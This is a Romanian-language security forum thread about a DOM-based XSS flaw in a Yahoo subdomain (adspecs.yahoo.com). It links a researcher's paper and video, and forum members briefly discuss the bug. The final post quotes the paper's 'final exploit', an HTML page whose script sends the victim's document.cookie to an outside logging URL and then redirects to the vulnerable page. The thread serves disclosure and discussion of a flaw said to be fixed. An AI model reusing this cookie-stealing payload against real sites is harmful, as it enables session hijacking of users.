neox Posted January 29, 2013 Report Posted January 29, 2013 vulnerabilitate pocvideohttp://www.offensive-security.com/videos/yahoo-xss-0day.mp4DOMSDAY Analyzing a DOM-Based XSS in Yahoo!Abysssec Security Research Quote
teko. Posted January 29, 2013 Report Posted January 29, 2013 Interesant, si codul din acel "evil.html" nu e facut public si sper sa nu ajunga public. Quote
nein Posted January 29, 2013 Report Posted January 29, 2013 e xss in yahoo maill ? mai pe scurt.. Quote
nAb.h4x Posted January 29, 2013 Report Posted January 29, 2013 e xss in yahoo maill ? mai pe scurt..Da ! E XSS Dom Based ! Quote
alexx666xx Posted January 29, 2013 Report Posted January 29, 2013 o sa fie facut public cand o sa repare problema cei de la yahoo Quote
ionut97 Posted January 29, 2013 Report Posted January 29, 2013 (edited) In paper scrie clar ca vulnerabilitatea era intr-un js folosit de toate subdomeniile adspecs.yahoo.com.Totul a fost raportat si rezolvat.http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf"Final exploit":<html> <script> window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';location.href="http://adspecs.yahoo.com/index.php"; </script></html>+ ca XSS-ul putea fi gasit cu DOMinator. Edited January 29, 2013 by ionut97 Quote
